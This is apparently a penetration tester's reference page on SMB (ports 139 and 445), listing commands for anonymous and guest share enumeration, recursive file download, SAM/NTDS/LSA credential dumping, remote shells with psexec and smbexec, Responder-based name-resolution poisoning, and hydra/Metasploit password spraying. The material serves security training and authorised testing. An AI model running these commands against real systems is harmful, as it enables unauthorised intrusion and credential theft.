πŸ’₯Cyb3rBook

139, 445 - SMB

6 min read

PRIMARY CATEGORY β†’ PROTOCOLS AND SERVICES
REFERENCES
Guest vs Null Session on WindowsSee here

SMB β†’ Server Message Block

Ports
SBM Over NETBIOS

These UDP/TCP Ports use NETBIOS as an intermediate layer between the Transport layer and the Application layer

SMB Version β†’ v1.1 or <

  • 137 β†’ NBNS (NetBIOS Name Service) β†’ UDP

IP Addresses resolution to host names

  • 138 β†’ Datagrams Transmission β†’ UDP

Non-connection oriented datagram transmission services

  • 139 β†’ Connection Oriented SMB Sessions β†’ TCP
SMB Over TCP

SMB Version β†’ 2.X - 3.X and >

  • 445 β†’ SMB Direct Over TCP

Enumeration

Netexec

Netexec

nxc smb <TARGET>
Null/Anonymous Authentication
Netexec
nxc smb <TARGET> --username '' --password '' # Long Format
nxc smb <TARGET> -u '' -p '' # Short Format
SMBMap

SMBMap

  • Local User
smbmap -u '' -p '' -H <TARGET>
  • Domain User
smbmap -u '' -p '' -d '<DOMAIN>' <TARGET>
Guest Authentication
Netexec
nxc smb <TARGET> --username 'guest' --password '' # Or -u 'anyrandomuser'
Shared Resources Enumeration
Null Auth
  • Netexec
nxc smb <TARGET> --username '' --password '' --shares
  • SMBMap
smbmap -u '' -H <TARGET>
  • SMBClient

SMBClient

smbclient --user '' --no-pass --list <TARGET>
smbclient -U '' -N -L //<TARGET>
  • SMBClient.py (Impacket)

SMBClient.py

smbclient.py -no-pass '<DOMAIN/WORKGROUP>@<TARGET>'
Guest Auth
  • Netexec
nxc smb <TARGET> --username 'guest' --password '' --shares
  • SMBMap
smbmap -u 'guest' -p '' -H <TARGET>
  • SMBClient
smbclient --user 'guest%' --list active.htb
  • SMBClient.py (Impacket)
smbclient.py -no-pass '<DOMAIN/WORKGROUP>/guest@<TARGET>'
User Account Authentication
  • Netexec
nxc smb <TARGET> --username '<USER>' --password '<PASSWORD>' --shares
  • SMBMap
smbmap -u '<USER>' -p '<PASSWORD>' -H <TARGET>
  • SMBClient
smbclient --user '<USER>%<PASSWORD>' '//<TARGET>/<RESOURCE>'
smbclient --user '<DOMAIN/WORKGROUP>\<USER>%<PASSWORD>' '//<TARGET>/<RESOURCE>'
  • SMBClient.py (Impacket)
smbclient.py -no-pass '<DOMAIN/WORKGROUP>/<USER>@<TARGET>'
Recursively Enumeration
  • Netexec
nxc smb <TARGET> --username '' --password '' --module spider_plus # All Files
nxc smb <TARGET> -u '' -p '' -M spider_plus # Short Format
nxc smb <TARGET> --username '' --password '' --module spider_plus --share <RESOURCE_PATH> # Specific Shared Directory
  • SMBMap
smbmap -H <TARGET> -u '' -p '' -R # All Shared Resources
smbmap -H <TARGET> -u '' -p '' -R --depth <INTEGER> # All Shared Resources limited to X depth
smbmap -H <TARGET> -u '' -p '' -r '<SHARED_RESOURCE>' # A Specific Shared Resource
Recursive Download
  • SMBClient
smbclient --user '' --no-pass //<TARGET>/<RESOURCE_PATH>
> mask ""
> recurse on
> prompt off
> mget *
User Enumeration

Need Domain Account Valid Credentials

NetExec
nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --users
Logged-on Users Enumeration
Netexec
nxc smb <TARGET> --username '<USER>' --password '<PASSWD>' --loggedon-users

Mount a Shared SMB Folder

Mount
No Auth

Null Session or Guest Authentication

mount --types cifs --options //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH>
  • Read Only
mount --types cifs --options ro //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH>
Auth Required
mount --types cifs --options username=<USER>,password=<PASSWORD> //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH>
  • Read Only
- [ ] mount --types cifs --options ro,username=<USER>,password=<PASSWORD> //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH>

Sensitive Data Dump

Privileged Account Credentials are required

Dump SAM Credentials
nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --sam
Dump NTDS Credentials
nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --ntds
Dump LSA Secrets
nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --lsa
+ Info

Remote Connection

PSExec
PSExec.py (Impacket)

PSExec.py

psexec.py '<DOMAIN>/<USERNAME>:<PASSWORD>@<HOSTNAME>'
PSExec64.exe (Sysinternals)

PSExec64.exe

psexec64.exe -i -a <COMMAND> # e.g. cmd.exe || powershell.exe
SMBExec.py

SMBExec.py

smbexec.py '<DOMAIN>/<USERNAME>:<PASSWORD>@<HOSTNAME>'
+ Info

Lateral Movement


Authentication Coercion


MitM and Credential Cracking

By default, when a user logs in to a Windows Machine, whether it is domain-joined or not, any process run under that user is associated with an Access Token, which is, in turn, related to a Logon Session through an specific attribute

If the user login to the system Interactively (2) or Remotelye Interactively (10), its credentials are automatically tied to the Logon Session generated, and cached

The latter thing does not happen when we are talking about Network Authentication

To prevent the user from having to put repeteadly its credentials each time he asks for a network resource, which implies an authentication, Windows introduced SSO (Single Sign On

Because of this behaviour, if an attacker forces or coerces a Windows Machine to connect to a controlled SMB Server, which requires authentication, the victim will authenticate to the rogue server and then the credentials of that user will be grabbed

Likewise, a user, which is logged in to a Windows Machine, could misstype a single character on the hostname when introducing a UNC at the File Explorer, therefore indicanting an incorrect hostname

Then, the SMB Client would perform a DNS Query to its Primary DNS Server, which, in a domain-joined computer, is usually de DC, requesting for the Canonical Name and Address related to that hostname

Since the give hostname does not exist, the DNS Server will respond that there is no registry for the supplied name

At this point, the Windows Machine will use the following Multicast Name Resolution Protocols as a fallback β†’

  • mDNS β†’ Multicast Domain Name System
  • LLMNR β†’ Local Link Multicast Name Resolution
  • NBT-NS β†’ NetBios Name Service

As its name suggests, those protocols are multicast, so the client’s name resolution query is sent to all the hosts within the Multicast Range

If an attacker is listenting for those queries using a poisoning LLMNR, NBTNS and MDNS tool such as responder, which sets up an SMB Server, among any other things, he could respond to the victim indicating that the supplied hostname resolves to the Address of the attacker itself

So first, the SMB Client would negotiate with the rogue SMB Server the Protocol Version and Authentication Mechanisms, and then the victim would authenticate to SMB Server

At this point, the attacker would receive a Net-NTLMv2 Response, from which several actions can be carried out β†’


Responder

Responder

Responder.py --interface <INTERFACE>

Bruteforcing || Password Spraying

Netexec

Reference

Local Accounts
nxc smb <HOSTNAME> --username <USER OR USERLIST> --password <PASSWD OR PASSWDLIST> --domain . --local-auth
Domain Accounts
nxc smb <HOSTNAME> --username <USER OR USERLIST> --password <PASSWD OR PASSWDLIST> --domain <DOMAIN>
Hydra

ReferenceΒ Β Β Β β€’Β Β Β Β Hydra SMB2 Support

Compile from Source
  • Repository Cloning and Installation of Deps
git clone https://github.com/vanhauser-thc/thc-hydra Hydra
cd !$ && ./configure
apt install -y -- libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libmemcached-dev libgpg-error-dev libgcrypt11-dev libgcrypt20-dev
apt install -y -- libsmbclient-dev
  • Compilation and Installation of the Binary on the System

Before proceed with the compilation, check the ./configure’s output

make && sudo make install
  • Run Hydra with SMB2 as follows β†’
Bruteforcing
  • One User ↔ Passwordlist
hydra -v -T <THREADS> -l <USERNAME> -P <PASSWDLIST> <TARGET> smb2
  • Userlist β†’ Passwordlist
hydra -v -T <THREADS> -L <USERLIST> -P <PASSWORDLIST> <TARGET> smb2
Password Spraying
hydra -v -T <THREADS> -L <USERLIST> -p <PASSWORD> <TARGET> smb2
Metasploit
SMB_Login
msfconsole -q
> use auxiliary/scanner/smb/smb_login
> set user_file <USERLIST>
> set pass_file <PASSWDLIST>
> set rhosts <TARGET>
> run

Graph View

Backlinks